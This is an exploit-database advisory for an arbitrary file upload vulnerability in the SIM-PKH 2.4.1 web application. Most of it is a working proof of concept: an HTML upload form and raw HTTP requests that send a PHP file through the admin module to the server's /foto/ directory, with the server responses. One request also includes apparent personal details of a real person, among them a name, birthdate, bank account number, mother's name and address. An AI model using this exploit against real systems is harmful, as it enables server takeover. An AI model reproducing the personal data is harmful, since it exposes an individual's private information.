SIM-PKH 2.4.1 Arbitrary File Upload

2018.10.23
Credit: Ihsan Sencan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-22 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://simpkh.sourceforge.io/ # Software Link: https://sourceforge.net/projects/simpkh/files/latest/download # Version: 2.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 2) # Everyone.... <form method="POST" enctype="multipart/form-data" action="http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update"> <input name="fupload" type="file"> <input value="Upload" type="submit"></td></tr> </form> # Upload Path: http://localhost/[PATH]/foto/59phpinfo2.php POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------10453613844351558052030056362 Content-Length: 261 -----------------------------10453613844351558052030056362 Content-Disposition: form-data; name="fupload"; filename="phpinfo2.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------10453613844351558052030056362-- HTTP/1.1 200 OK Date: Mon, 22 Oct 2018 15:59:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5554 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # http://localhost/[PATH]/foto/59phpinfo2.php GET /sim-pkh/foto/59phpinfo2.php HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 Connection: keep-alive HTTP/1.1 200 OK Date: Mon, 22 Oct 2018 15:59:28 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # Users.... # http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update # Upload Path: http://localhost/[PATH]/foto/25phpinfo.php POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: [PATH]/admin/media.php?module=pengurus&act=editpengurus&id=320323241474 Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------84876618815601613714142368 Content-Length: 2745 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_pengurus" 320323241474 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="no_rekening" 0401741906 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="nama" IMAS -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="tempat" SUKABUMI -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="tl" 1985-11-08 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="Usia" 33 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="fupload"; filename="phpinfo.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="pekerjaan" BURUH -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="ibu_kandung" ELIS -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="suami" -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="alamat" KP BABAKAN RT 09 RW 02 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="no_hp" -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_desa" 4 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_kelompok" 13 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_jabatan" 2 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_status" 1 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="id_pendamping" pdp-01 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="bumil" 0 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="balita" 1 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="apras" 1 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="sd" 0 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="smp" 2 -----------------------------84876618815601613714142368 Content-Disposition: form-data; name="sma" 0 -----------------------------84876618815601613714142368-- HTTP/1.1 302 Found Date: Mon, 22 Oct 2018 15:42:39 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: ../../media.php?module=pengurus Content-Length: 1976 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top